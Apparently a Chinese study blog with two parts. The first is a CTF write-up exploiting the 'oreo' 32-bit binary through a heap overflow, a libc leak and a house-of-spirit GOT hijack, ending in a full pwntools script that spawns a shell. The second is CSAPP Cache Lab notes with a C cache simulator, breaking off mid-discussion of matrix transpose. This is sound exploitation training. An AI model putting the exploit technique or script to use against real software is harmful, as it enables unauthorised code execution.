0%

oreo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
➜  [/home/ywhkkx/桌面] ./oreo 
Welcome to the OREO Original Rifle Ecommerce Online System!

,______________________________________
|_________________,----------._ [____] -,__ __....-----=====
(_(||||||||||||)___________/ |
`----------' OREO [ ))"-, |
"" `, _,--....___ |
`/ """"

What would you like to do?

1. Add new rifle
2. Show added rifles
3. Order selected rifles
4. Leave a Message with your Order
5. Show current stats
6. Exit!
Action:
1
2
3
4
5
6
7
8
oreo: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.26, BuildID[sha1]=f591eececd05c63140b9d658578aea6c24450f8b, stripped

[*] '/home/ywhkkx/桌面/oreo'
Arch: i386-32-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)

32位,dynamically,开了canary,开了NX,libc-2.23

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
unsigned int Add()
{
char *v1; // [esp+18h] [ebp-10h]
unsigned int canary; // [esp+1Ch] [ebp-Ch]

canary = __readgsdword(0x14u);
v1 = chunk_list;
chunk_list = malloc(0x38u);
if ( chunk_list )
{
*(chunk_list + 13) = v1;
printf("Rifle name: ");
fgets(chunk_list + 25, 56, stdin); // chunk_list + 25 is Rname_addr
change(chunk_list + 25);
printf("Rifle description: ");
fgets(chunk_list, 56, stdin); // chunk_list + 0 is description_addr
change(chunk_list);
++new_times;
}
else
{
puts("Something terrible happened!");
}
return __readgsdword(0x14u) ^ canary;
}
1
2
3
4
5
6
pwndbg> x/20xw 0x804A288 // chunk_list
0x804a288: 0x0804ba00 0x00000000 0x00000000 0x00000000 // 最新chunk的地址
0x804a298: 0x00000000 0x00000000 0x00000000 0x00000002
0x804a2a8: 0x0804a2c0 0x00000000 0x00000000 0x00000000 // message_addr
0x804a2b8: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a2c8: 0x00000000 0x00000000 0x00000000 0x00000000
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
pwndbg> telescope 0x804b9b8
00:00000x804b9b8 ◂— 0x0 // chunk1
01:00040x804b9bc ◂— 0x41
02:00080x804b9c0 ◂— 'AAAAAAAA' // chunk1_description
03:000c│ 0x804b9c4 ◂— 'AAAA'
04:00100x804b9c8 ◂— 0x0
... ↓ 3 skipped
08:00200x804b9d8 ◂— 0x61616100 // chunk1_name
09:00240x804b9dc ◂— 'aaaaa'
0a:00280x804b9e0 ◂— 0x61
0b:002c│ 0x804b9e4 ◂— 0x0
... ↓ 4 skipped
10:00400x804b9f8 ◂— 0x0 // chunk2
11:00440x804b9fc ◂— 0x41
12:00480x804ba00 ◂— 'BBBBBBBB' // chunk2_description
13:004c│ 0x804ba04 ◂— 'BBBB'
14:00500x804ba08 ◂— 0x0
... ↓ 3 skipped
18:00600x804ba18 ◂— 0x62626200 // chunk2_name
19:00640x804ba1c ◂— 'bbbbb'
1a:00680x804ba20 ◂— 0x62
1b:006c│ 0x804ba24 ◂— 0x0
... ↓ 3 skipped
1f:007c│ 0x804ba34 —▸ 0x804b9c0 ◂— 'AAAAAAAA'
20:00800x804ba38 ◂— 0x0 // chunk3
21:00840x804ba3c ◂— 0x41
22:00880x804ba40 ◂— 'CCCCCCCC' // chunk3_description
23:008c│ 0x804ba44 ◂— 'CCCC'
24:00900x804ba48 ◂— 0x0
... ↓ 3 skipped
28:00a0│ 0x804ba58 ◂— 0x63636300 // chunk3_name
29:00a4│ 0x804ba5c ◂— 'ccccc'
2a:00a8│ 0x804ba60 ◂— 0x63
2b:00ac│ 0x804ba64 ◂— 0x0
... ↓ 3 skipped
2f:00bc│ 0x804ba74 —▸ 0x804ba00 ◂— 'BBBBBBBB'
30:00c0│ 0x804ba78 ◂— 0x0
31:00c4│ 0x804ba7c ◂— 0x21589
1
2
3
4
5
6
7
8
9
10
11
12
13
14
pwndbg> x/20wx 0x804b9b8
0x804b9b8: 0x00000000 0x00000041 0x41414141 0x41414141 // chunk1
0x804b9c8: 0x00000000 0x00000000 0x00000000 0x00000000
0x804b9d8: 0x61616100 0x61616161 0x00000061 0x00000000
0x804b9e8: 0x00000000 0x00000000 0x00000000 0x00000000
0x804b9f8: 0x00000000 0x00000041 0x42424242 0x42424242 // chunk2
0x804ba08: 0x00000000 0x00000000 0x00000000 0x00000000
0x804ba18: 0x62626200 0x62626262 0x00000062 0x00000000
0x804ba28: 0x00000000 0x00000000 0x00000000 0x0804b9c0 // data of chunk1
0x804ba38: 0x00000000 0x00000041 0x43434343 0x43434343 // chunk3
0x804ba48: 0x00000000 0x00000000 0x00000000 0x00000000
0x804ba58: 0x63636300 0x63636363 0x00000063 0x00000000
0x804ba68: 0x00000000 0x00000000 0x00000000 0x0804ba00 // data of chunk2
0x804ba78: 0x00000000 0x00021589 0x00000000 0x00000000

输入的 description 可以溢出到下一个 chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
unsigned int Show()
{
char *i; // [esp+14h] [ebp-14h]
unsigned int canary; // [esp+1Ch] [ebp-Ch]

canary = __readgsdword(0x14u);
printf("Rifle to be ordered:\n%s\n", "===================================");
for ( i = chunk_list; i; i = *(i + 13) )
{
printf("Name: %s\n", i + 25);
printf("Description: %s\n", i);
puts("===================================");
}
return __readgsdword(0x14u) ^ canary;
}

chunk_list 中装有当前 chunk 的地址,它的遍历完全依靠末尾的地址(向前遍历),完全可以劫持末尾的地址来打印函数

比如把它劫持为“puts_got - 25”,程序会把“puts_got”当成下一个 chunk 的 name

​ // 当然也可以劫持为“puts_got”,程序会把“puts_got”当成下一个 chunk 的 description

1
2
3
4
5
6
7
8
9
10
11
12
puts_got=elf.got['puts']
payload='aaa'+'bbbb'*6+p32(puts_got-25)
add(payload,"chunk1")
show()
p.readuntil("Name: ")
leak_addr=u32(p.read(4))
libc_base=leak_addr-libc.sym['puts']
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

system_libc=libc_base+libc.sym['system']
success('system_libc >> '+hex(system_libc))

可以打 house of spirit,其核心为:free一个假的chunk,下次malloc把它申请回来

为了绕过 libc 对 free fastbin 的检查,需要设置“chunk->size”和“nextchunk->size”

1
2
3
4
5
6
7
8
9
10
.bss:0804A2A0 order_times     dd ?                    ; DATA XREF: Order+5A↑r
.bss:0804A2A0 ; Order+62↑w ...
.bss:0804A2A4 new_times dd ? // target
.bss:0804A2A4 ; Add+CD↑w ...
.bss:0804A2A8 ; char *message
.bss:0804A2A8 message dd ? ; DATA XREF: Message+23↑r
.bss:0804A2A8 ; Message+3C↑r ...
.bss:0804A2AC align 20h
.bss:0804A2C0 message_addr db
.bss:0804A2C1 db ? ;

new_times 在申请 chunk 后会增加“1”,所以可以申请“0x40”个 chunk 来伪造“chunk->size”,那么“nextchunk->size”就应该在“0x804A2A4+0x40=0x804a2e4”,这一大片空间都是用来存放“message”的,并且可以控制

1
2
3
4
5
6
7
8
9
fake_heap = 0x804A2A4 # addr of new_times

for x in range(0x40-1): # 为了实现fastbin同组和内存对齐,chunk->size必须为0x40
add("mm", "gg")

payload = "aaa" + "bbbb"*6 + p32(fake_heap+4) # the data of fake_heap
add(payload, "chunkn")
message = "\x00\x00\x00\x00"*9 + p32(0x41) # nextchunk->size只要符合条件就好
leave(message)

先覆盖末尾的“lastchunk->FD”为“fake_heap+8”

1
2
3
4
5
6
7
8
9
10
11
12
pwndbg> telescope 0x804A2A4
00:00000x804a2a4 ◂— 0x41 /* 'A' */
01:00040x804a2a8 —▸ 0x804a2c0 ◂— 0x0 // start addr of message
02:00080x804a2ac ◂— 0x0
... ↓ 5 skipped
pwndbg>
08:00200x804a2c4 ◂— 0x0
... ↓ 7 skipped
pwndbg>
10:00400x804a2e4 ◂— 0x41 /* 'A' */
11:00440x804a2e8 ◂— 0xa /* '\n' */
12:00480x804a2ec ◂— 0x0

接下来可以进行 free 了,最后打 GOT 劫持:

1
2
3
4
free()
add("name", p32(scanf_got))
leave(p32(system_libc))
p.sendline("/bin/sh\0")
1
2
3
4
5
6
7
8
9
pwndbg> bins
fastbins
0x10: 0x0
0x18: 0x0
0x20: 0x0
0x28: 0x0
0x30: 0x0
0x38: 0x0
0x40: 0x804a2a0 —▸ 0x9d72810 ◂— 0x0

free 执行后,“0x804a2a0”进入 fastbin ,下一次就会申请这个地址,并且把“description”写在“0x804a2a0+0x8”(这刚好是 message 的地址,写 message 时会进行劫持)

1
2
3
4
5
6
pwndbg> telescope 0x804a2a0
00:00000x804a2a0 ◂— 0x1
01:00040x804a2a4 ◂— 0x42 /* 'B' */
02:00080x804a2a8 —▸ 0x804a258 (__isoc99_sscanf@got.plt) —▸ 0xf7e6b4d0 (__isoc99_sscanf) ◂— sub esp, 0xc
03:000c│ 0x804a2ac ◂— 0x0
... ↓ 4 skipped

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from pwn import *
context.log_level = "debug"

def add(name, descrip):
p.readuntil("Action:")
p.sendline("1")
p.readuntil("name:")
p.sendline(name)
p.readuntil("description:")
p.sendline(descrip)

def show():
p.readuntil("Action:")
p.sendline("2")
p.readuntil("Name: ")
p.readuntil("Name: ")
return u32(p.read(4))

def free():
p.readuntil("Action:")
p.sendline("3")

def leave(message):
p.readuntil("Action:")
p.sendline("4")
p.readuntil("order: ")
p.sendline(message)

p = process("oreo", stdin=PTY) # 注意:这里不这么写的话就无法读取数据
elf=ELF('./oreo')
libc=ELF('./libc-2.23.so')

puts_got=elf.got['puts']
payload='aaa'+'bbbb'*6+p32(puts_got)
add(payload,"chunk1")
show()

p.readuntil("cription: ") # 对应的recv都改为read
leak_addr=u32(p.read(4))
libc_base=leak_addr-libc.sym['puts']
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))
system_libc=libc_base+libc.sym['system']
success('system_libc >> '+hex(system_libc))

scanf_got = 0x804A258
fake_heap = 0x804A2A4
system_offset = 0x3ada0

for x in range(0x40-1):
add("mm", "gg")

payload = "aaa" + "bbbb"*6 + p32(fake_heap+4)
add(payload, "chunkn")
message = "\x00\x00\x00\x00"*9 + p32(0x41)
leave(message)

free()
add("name", p32(scanf_got))
leave(p32(system_libc))
p.sendline("/bin/sh\0")

p.interactive()

house of spirit 小结(2.23)

house of spirit 的核心在于free掉一个伪造的chunk

特点归纳如下:

  • 需要修改模块
  • 不需要可控的释放模块
  • 需要一些“计数器”方便伪造“chunk->size”和“nextchunk->size”

伪造“chunk->size”和“nextchunk->size”就是这种攻击的关键,确定了目标地址后,需要思考“下一个chunk”是否可控(为了写入“nextchunk->size”),有时可以通过调整“chunk->size”来把“下一个chunk”伪造到可控的区域内

注意:“chunk->size”要符合内存对齐,还要保证后续malloc可以申请回来,“nextchunk->size”随便

打算使用这种攻击前,先看看“计数器”的位置,主要看它后面有没有可以控制的区域,然后看修改模块可不可以控制这些区域,如果这两个条件都可以完成,就可以打“GOT劫持”或者“hook劫持”

Cache Lab

本实验室将帮助您了解:缓存内存对C语言性能的影响

实验室由两部分组成:

  • 在第一部分中,您将编写一个小型C程序(大约200-300行),该程序模拟缓存的行为
  • 在第二部分中,您将优化一个小的矩阵转置函数,目标是最小化缓存未命中的数量

缓存机制

Cache简析

CPU在执行时,需要的指令和数据通过内存总线和系统总线由内存传送到寄存器,再由寄存器送入ALU

SRAM的速度介于DRAM(主存)和CPU之间,我们把接下来可能会用到的数据放在SRAM(Cache)中,当CPU需要数据时先去查Cache,如果Cache中有(hit),就不用再去访问主存了,这样就节省了时间

Cache结构

Cache共有S组,每组E行,每行包括一个有效位(valid bit),一个标签和B比特数据:

我们可以将高速缓存存储器视为:

  • 有S个高速缓存的:组
  • 每个数组包含E个高速:缓存行
  • 每个行的组成:B字节的数据块 + 各种指示位

高速缓存的结构可以用元组(S,E,B,m)来描述,高速缓存的大小(或容量)C指的是所有块的大小的和,所以:C = S×E×B

每个高速缓存存储器有m位,可以组成 2的m次幂 个不同的地址,每个数据块由以下三部分构成

  • 有效位:有效位为 v 位,v 一般为1,指明这个行是否包含有效信息
  • 标记位:标记位为 t 位,指明这个行是否包含有效信息
  • 组索引:组索引为 s 位,表示为无符号数作为组的索引
  • 块偏移:块偏移为 b 位,指明CPU请求的内容在数字块中的偏移

Cache逻辑

数据总是以块为单位,在高速缓存和主存之间来回复制

如果我们的程序请求一个数据字,这个数据字存储在编号为10的块中,将分以下几种情况考虑:

  • 冷不命中:高速缓存中为空
  • 缓存不命中:高速缓存中有数据块,但没有数据块10
  • 冲突不命中:高速缓存中有数据,将内存中的数据块放置到高速缓存中时,发生了冲突
  • 缓存命中:高速缓存中有数据块10,直接返回CPU

当一条加载指令指示CPU从主存地址A中读取一个字w时,会将该主存地址A发送到高速缓存中,则高速缓存会根据以下步骤判断地址A是否命中:

  • 组选择:根据地址划分,将中间的 s位 表示为无符号数作为组的索引,可得到该地址对应的组
  • 行匹配:根据地址划分,可得到 t位 的标记位(由于组内的任意一行都可以包含任意映射到该组的数据块,所以就要线性搜索组中的每一行),判断是否有和标志位匹配且设置了有效位的行 ,如果存在,则缓存命中,否则缓冲不命中
  • 字选择:如果找到了对应的高速缓存行,则可以将 b位 表示为无符号数作为块偏移量 ,得到对应位置的字

当高速缓存命中时:会很快抽取出字w,并将其返回给CPU

如果缓存不命中时:CPU会进行等待,高速缓存会向主存请求包含字w的数据块,当请求的块从主存到达时,高速缓存会将这个块保存到它的一个高速缓存行中,然后从被存储的块中抽取出字w,将其返回给CPU

Cache映射

(S,E,B,m)=(4,1,2,4)

假设某个Cache有:4个组,每个组1行,每个块2字节,地址m为4位:

因为地址为4位,所以地址空间可以分为16个区域,编号为 地址0 ~ 地址15

每个块的大小为2字节,所以两个内存区域可以组成一个块,通过 标记位(Tag) 和 索引位(Index)可以唯一确定每一个块,共有8个块

但是 Cache 只有4个组(每个组只有1行),所以可能会有两个块被映射到同一个组,比如:块0和块4被都被映射到了set0,而块1和块5都被映射到了set1

也就是说,块和组可能不是一一对应的,这就导致了冲突不命中

PS:为什么不采用高位来作为组索引位(s位):

直接映射高速缓存

根据 cache 每个组中行数的不同,cache 被分为不同的类型,当行数为 1 时(E==1),这种 cache 被称为直接映射

假设有 S 组,每组由1行组成,缓存块为8字节

组选择

CPU发出地址要取数据字,高速缓存将该地址分解为三部分:标记位,组索引,块偏移

上图程序的 组索引(s位)为 “0x1” ,所以索引第2个组

行匹配

然后,检查地址中的 标记位 与缓存行中的 标记位 是否匹配:

  • 如果匹配,将进行下一步字选择
  • 如果不匹配,则表示未命中(高速缓存必须从内存中重新取数据块,在行中覆盖此块)

字选择

上图程序的 块偏移(b位)为 “0x4” ,所以索引标记为“0x4”的块,返回给CPU

​ // 字选择的操作是为了确定目标数据的起始地址

模拟演示

假设,内存地址为4字节,S=4组,E=1行/组,B=2字节/块,其结构图如下所示:

我们模拟CPU要从高速缓存中读取地址为“0,1,7,8,0”的数据:

地址 二进制 是否命中
0 [0000](t=0,s=00,b=0)
1 [0001](t=0,s=00,b=1)
7 [0111](t=0,s=11,b=1)
8 [1000](t=1,s=00,b=0)
0 [0000](t=0,s=00,b=0)

第一步,读地址0的数据:标记位为 0,索引位为 “00”,偏移位为 “0”,块号为 0

缓存行中没有数据,组0 的有效位为 0,地址0 的标记位和 组0 的标记位不匹配,因此,未命中,然后,高速缓存从内存中取出块0,块1(共2字节)并存储在 组0 中

第二步,读地址1的数据:标记位为 0,索引位为 “00”,偏移位为 “1”,块号为 1

缓存行中已有数据数据,组0 的有效位为 1,地址1 的标记位和 组0 的标记位匹配,因此,命中,具体如下图所示

第三步,读地址7的数据:标记位为 0,索引位为 “11”,偏移位为 “1”,块号为 3

缓存行中有数据,组3 的有效位为 0,地址7 的标记位 和 组0 的标记位不匹配,因此,未命中,然后,高速缓存从内存中取出块6,块7(共2字节)并存储在组3中

第四步,读地址8的数据:标记位为 1,索引位为 “00”,偏移位为 “0”,块号为 4

缓存行中有数据,组0 的有效位为 1,地址的标记位 和 组0 的标记位不匹配,因此,未命中,然后,高速缓存从内存中取出块8,块9(共2字节)并存储在组0中

第五步,读地址0的数据:标记位为 0,索引位为 “00”,偏移位为 “0”,块号为 0

缓存行中有数据,组0 的有效位为 1,地址的标记位 和 组0 的标记位不匹配,因此,未命中,然后,高速缓存从内存中取出块0,块1(共2字节)并存储在组0中

总而言之:先通过索引位定位正确的组,然后对比标记位判断是否命中:

局部性原理

  • 时间局部性:最近访问的数据可能在不久的将来会再次访问
  • 空间局部性:位置相近的数据常常在相近的时间内被访问

根据局部性原理,我们可以把计算机存储系统组织成一个存储山,越靠近山顶,速度越快,但造价越昂贵,越靠近山底,速度越越慢,但造价越便宜

上一层作为下一层的缓冲,保存下一层中的一部分数据

局部性的影响因素

变量 sum 在每次循环中被引用一次,说明它具有良好的时间局部性,它只有一个空间,所以没有空间局部性

变量 v 读取的顺序和在内存中存储的顺序是一致的,说明它具有良好的空间局部性,但是每次循环只访问变量 v 中的一个数据,因此它的时间局部性很差

空间局部性的影响因数:步长

从 a[0] [0] 到 a[0] [1] Address 增加了“4”,所以步长为“4”

从 a[0] [0] 到 a[0] [1] Address 增加了“12”,所以步长为“12”

对比步长得知:第一个程序比第二个程序更具效率

时间局部性的影响因数:分块

分块技术可以提高时间局部性,具体的分块安排需要对照Cache的规格

分块技术的核心其实是为了每一行Cache被充分地使用:

1
2
3
4
5
6
7
8
9
10
int A[N][M];
int B[M][N];
int tmp;

for (i = 0; i < N; i++) {
for (j = 0; j < M; j++) {
tmp = A[i][j];
B[j][i] = tmp;
}
}

假设Cache每行有32字节,每组1行,那么内存第一次循环时,会把 A[0] [0] ~ A[0] [7] 放入第1组,把 B[0] [0] ~ B[0] [7] 放入第2组

当第二次循环获取 A[0] [1] 时可以命中,但获取 B[][][1] [0] 时不会命中,并且把 B[1] [0] ~ B[1] [7] 放入第3组

以此类推,当Cache空间不够时,就可能覆盖前面的内容,导致数组B永远也不可能命中了

但是如果可以把 N * M 的大矩阵分为小矩阵,使其可以存储下当前小矩阵中所有的 数组B 的值,就可以在多次不命中后再次命中

实验文件介绍

  • csim.c:实验PartA写在此处
  • trans.c:实验PartB写在此处
  • csim-ref:一个对照文件
  • test-csim:PartA的检查程序,使用它可以得到实验的分散
  • traces:装有每次对内存进行的操作
1
linux> valgrind --log-fd=1 --tool=lackey -v --trace-mem=yes ls -l
1
2
3
4
5
6
7
8
9
10
11
12
13
14
I  04ead900,3
I 04ead903,3
I 04ead906,5
I 04ead838,3
I 04ead83b,3
I 04ead83e,5
L 1ffefff968,8
I 04ead843,3
I 04ead846,3
I 04ead849,5
L 1ffefff960,8
I 04ead84e,3
I 04ead851,3
......

根据 trace 文件中记载的每一次对内存的操作,分析格式为:

1
[空格][操作类型][空格][内存地址][逗号][大小]

操作类型有以下三种:

  • L:从内存中读取(1次控制cache)
  • S:向内存中存储(1次控制cache)
  • M:对内存进行修改(2次控制cache)

然后实验给我们提供了一个程序csim-ref,我们要做的就是写出一个和它功能一样的程序

PartA Cache simulator

参考模拟器采用以下命令行参数:

1
2
3
4
5
6
7
Usage: ./csim-ref [-hv] -s <s> -E <E> -b <b> -t <tracefile>
• -h:可选的帮助标志,用于打印使用情况信息
• -v:显示跟踪信息的可选详细标志
• -s <s>:设置的索引位数(S = 2s是设置的数量)
• -E <E>:关联性(每组行数)
• -b <b>:块位数(B = 2b是块大小)
• -t <tracefile>:要重播的valgrind跟踪的名称

开始实验前要先了解一个函数:getopt

1
getopts [option[:]] [DESCPRITION] VARIABLE
  • option:表示为某个脚本可以使用的选项
  • VARIABLE:表示将某个选项保存在变量VARIABLE中

定义结构体

cache_line结构体中包括:有效位,标记位,时间戳

1
2
3
4
5
typedef struct{
int valid_bits; // 有效位
unsigned tag; // 标记位
int stamp; // 时间戳
}cache_line;

这个结构体将会被当成指针使用

初始化Cache

1
2
3
4
5
6
7
8
9
10
11
12
void init(){
cache = (cache_line**)malloc(sizeof(cache_line*)*S); // 申请S个组
for(int i=0;i<S;i++)
*(cache+i) = (cache_line*)malloc(sizeof(cache_line)*E); // 申请E个行
for(int i=0;i<S;i++){
for(int j=0;j<E;j++){
cache[i][j].valid_bits = 0; // 初始化有效位为'0'
cache[i][j].tag = -1; // 初始化标记位为'-1'(正常情况下tag不会为负)
cache[i][j].stamp = 0; // 初始化时间戳为'0'
}
}
}
  • 先申请大小为 “sizeof ( cache_line ) S” 的空间,代表S个组
  • 再申请S个大小为 “sizeof ( cache_line ) * E” 的空间,代表每个组中有E个行
  • 把 申请的E空间首地址 赋值给 申请的S空间 的各个单元

结构体类型的指针:作为数组使用时,分配更大的空间(类比 int 和 char 类型的数组)

解析输入的指令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
void parse_trace()
{
FILE* file=fopen(filepath,"r");
if(file == NULL){
printf("Open file wrong");
exit(-1);
}
char operation;
unsigned address;
int size;
while(fscanf(file," %c %x,%d",&operation,&address,&size)>0){
switch(operation){
case 'L':
update(address); // 一次操作cache
break;
case 'M':
update(address); // 两次操作cache
case 'S':
update(address); // 一次操作cache
break;
}
time(); // 操作时间
}
for(int i=0;i<S;i++)
free(*(cache+i));
free(cache);
fclose(file);
}

用 fscanf 读入 trace 文件的指令来进行操作,分别对“L”,“M”,“S”进行操作(这里并不用细分它们的功能,只需要模拟它们对 cache 的使用就可以了)

Cache的命中判断+添加+代替

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
void update(unsigned address){

// 获取s位和t位
unsigned s_address =(address>>b) & ((0xffffffff)>>(32-s)); //获取s位
unsigned t_address = address>>(s+b); // 获取t位

// 判断tag为是否相等,是否命中
for(int i=0;i<E;i++){
if((*(cache+s_address)+i)->tag ==t_address){
cache[s_address][i].stamp = 0; // 重置时间戳
hit++; // 命中计数器+1
return;
}
}
/* "*(cache+s_address)"表示对应的组,后续对组中的所以行进行遍历操作,判断命中 */

// 添加高速缓存cache
for(int i=0;i<E;i++){
if(cache[s_address][i].valid_bits == 0){
cache[s_address][i].tag = t_address;
cache[s_address][i].valid_bits = 1; // 重置时有效为'1'
cache[s_address][i].stamp = 0; // 重置时间戳
miss++; // 不命中计数器+1
return;
}
}
/* 未命中时,程序会获取空闲的cache(没有分配数据),否则进入"代替模块" */

// 暴力实现LRU策略(cache代替)
int max_stamp=0;
int max_i;
for(int i=0;i<E;i++){
if(cache[s_address][i].stamp > max_stamp){
max_stamp = cache[s_address][i].stamp;
max_i = i;
}
}
eviction++;
miss++;
cache[s_address][max_i].tag = t_address;
cache[s_address][max_i].stamp = 0;
}

LRU策略

LRU 缓存淘汰算法就是一种常用策略。 LRU 的全称是 Least Recently Used,也就是说我们认为最近使用过的数据应该是是「有用的」,很久都没用过的数据应该是无用的

如果该SET存满了,我每次要找到 TIMESTAMP(时间戳)最小的替换

本程序中采用了 stamp ,有所不同:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
void time(){ // 所有可用的cache(已分配数据的),stamp+1
for(int i=0;i<S;i++){
for(int j=0;j<E;j++){
if(cache[i][j].valid_bits == 1)
cache[i][j].stamp++;
}
}
}

// 暴力实现LRU策略(cache代替)
for(int i=0;i<E;i++){
if(cache[s_address][i].stamp > max_stamp){
max_stamp = cache[s_address][i].stamp;
max_i = i;
}
}
eviction++; // 驱逐计数器+1
miss++; // 不命中计数器+1
cache[s_address][max_i].tag = t_address;
cache[s_address][max_i].stamp = 0;

在time中,会使所有已分配数据的 cache 的“cache->stamp”持续增加,而命中和更新都可以重置时间戳,那些长时间未被使用的 cache 的 stamp 更大,更应该被替换掉

完整代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
#include "cachelab.h"
#include <getopt.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <stddef.h>

typedef struct {
int valid_bits;
unsigned tag;
int stamp;
}cache_line;

char* filepath = NULL;
int s, E, b, S;
int hit = 0;
int miss = 0;
int eviction = 0;
cache_line** cache = NULL;

void init();
void update(unsigned address);
void time();
void parse_trace();

void init()
{
cache = (cache_line**)malloc(sizeof(cache_line*) * S);
for (int i = 0; i < S; i++)
*(cache + i) = (cache_line*)malloc(sizeof(cache_line) * E);
for (int i = 0; i < S; i++)
for (int j = 0; j < E; j++)
{
cache[i][j].valid_bits = 0;
cache[i][j].tag = -1;
cache[i][j].stamp = 0;
}
}

void update(unsigned address)
{
unsigned s_address = (address >> b) & ((0xffffffff) >> (32 - s));
unsigned t_address = address >> (s + b);
for (int i = 0; i < E; i++) {
if ((*(cache + s_address) + i)->tag == t_address){
cache[s_address][i].stamp = 0;
hit++;
return;
}
}

for (int i = 0; i < E; i++) {
if (cache[s_address][i].valid_bits == 0) {
cache[s_address][i].tag = t_address;
cache[s_address][i].valid_bits = 1;
cache[s_address][i].stamp = 0;
miss++;
return;
}
}

int max_stamp = 0;
int max_i;
for (int i = 0; i < E; i++) {
if (cache[s_address][i].stamp > max_stamp) {
max_stamp = cache[s_address][i].stamp;
max_i = i;
}
}
eviction++;
miss++;
cache[s_address][max_i].tag = t_address;
cache[s_address][max_i].stamp = 0;
}

void time() {
for (int i = 0; i < S; i++) {
for (int j = 0; j < E; j++) {
if (cache[i][j].valid_bits == 1) {
cache[i][j].stamp++;
}
}
}
}

void parse_trace() {
FILE* file = fopen(filepath, "r");
if (file == NULL)
{
printf("Open file wrong");
exit(-1);
}
char operation;
unsigned address;
int size;
while (fscanf(file, " %c %x,%d", &operation, &address, &size) > 0) {
switch (operation) {
case 'L':
update(address);
break;
case 'M':
update(address);
case 'S':
update(address);
break;
}
time();
}
for (int i = 0; i < S; i++) {
free(*(cache + i));
}
free(cache);
fclose(file);
}

int main(int argc, char* argv[]) {
int opt;
while ((opt = getopt(argc, argv, "s:E:b:t:")) != -1) {
switch (opt) {
case 's':
s = atoi(optarg);
break;
case 'E':
E = atoi(optarg);
break;
case 'b':
b = atoi(optarg);
break;
case 't':
filepath = optarg;
break;
}
}
S = 1 << s;

init();
parse_trace();

printSummary(hit, miss, eviction);
return 0;
}

PartB Efficient Matrix Transpose

在 trans.c 中为提供了一个示例转置函数,用于计算转置N×M矩阵A并将结果存储在M×N矩阵B中:

1
2
3
4
5
6
7
8
9
10
11
void trans(int M, int N, int A[N][M], int B[M][N])
{
int i, j, tmp;

for (i = 0; i < N; i++) {
for (j = 0; j < M; j++) {
tmp = A[i][j];
B[j][i] = tmp;
}
}
}

示例的转置函数是正确的,但是效率很低,因为访问模式会导致相对许多缓存未命中

在B部分中,我们将在 trans.c 中编写一个 矩阵转置函数( transpose_submit ),该函数将尽可能降低高速缓存未命中率

判分程序最终会检查矩阵转置函数在以下三种大小的矩阵上的表现:

  • 32 * 32,miss<300 得8分,miss>600不得分
  • 64 * 64,miss<1300 得8分,miss>2000不得分
  • 61 * 67,miss<2000 得10分,miss>3000不得分

在PartB中提供得Cache规格:S = 5,E = 1,b = 5(32组,每组1行,每行32字节)

32 * 32

先看看 trans.c 中提供的那个函数的 cache 使用情况

矩阵A的步长为“1”,所以空间局部性良好,而矩阵B的步长为“32”,空间局部性较差,并且无论我们怎么调整循环顺序,都无法改变,所以无法从空间局部性的角度来减少不命中次数

每行32字节,意味着每行可以获取8个数组单位(int类型)

组(时间顺序) 元素
第1个 (第1轮) A [0] [0] ~ A [0] [7]
第2个 B [0] [0] ~ B [0] [7]
第3个 B [1] [0] ~ B [1] [7]
…… ……
第8个 B [6] [0] ~ B [6] [7]
第9个 B [7] [0] ~ B [7] [7]
第10个 (第2轮) A [0] [8] ~ A [0] [15]
第11个 B [8] [0] ~ B [8] [7]
第12个 B [9] [0] ~ B [9] [7]
…… ……
第28个 (第4轮) A [0] [24] ~ A [0] [31]
第29个 B [24] [0] ~ B [24] [7]
第30个 B [25] [0] ~ B [25] [7]
第31个 B [26] [0] ~ B [26] [7]
第32个 B [27] [0] ~ B [27] [7]

注意:为了理解方便,此时没有考虑“两个块映射到同一个组”这种情况,后续会进行分析

当读取 B[28] [0] 时,就会使 “A [0] [0] ~ A [0] [7]” 被代替,从而导致 A[1] [0] 不命中,那么后续的操作会不断替代前面的缓存,cache 利用率大大下降

如果把 32 32 的矩阵分为 16 个 8 8 的矩阵:

每次只会先在解决一个小矩阵,才开始运算下面一个小矩阵

第1轮 A[0] [0] 和 B[0] [0],A[0] [1] 和 B[1] [0],A[0] [2] 和 B[2] [0] …… A[0] [7] 和 B[7] [0]

第2轮 A[1] [0] 和 B[0] [1],A[1] [1] 和 B[1] [1],A[1] [2] 和 B[2] [1] …… A[1] [7] 和 B[7] [1]

第3轮 A[2] [0] 和 B[0] [2],A[2] [1] 和 B[1] [2],A[2] [2] 和 B[2] [2] …… A[2] [7] 和 B[7] [2]

…………..

